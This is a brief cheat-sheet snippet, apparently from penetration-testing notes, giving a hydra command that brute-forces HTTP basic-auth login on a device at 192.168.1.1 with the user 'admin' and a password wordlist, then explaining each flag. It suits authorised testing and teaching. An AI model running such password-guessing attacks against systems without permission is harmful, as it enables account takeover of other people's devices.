hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1 http-get / -l = username -P = password (Looks for a wordlist) -e ns = checks for 'null' password -t xx= How many tasks to run at once -f = exit once it finds the first user/password -s = connect via SSL -vV = verbose mode (shows more info) 192.168.1.1 = IP address http-get = what to crack/method etc / = Page to crack - root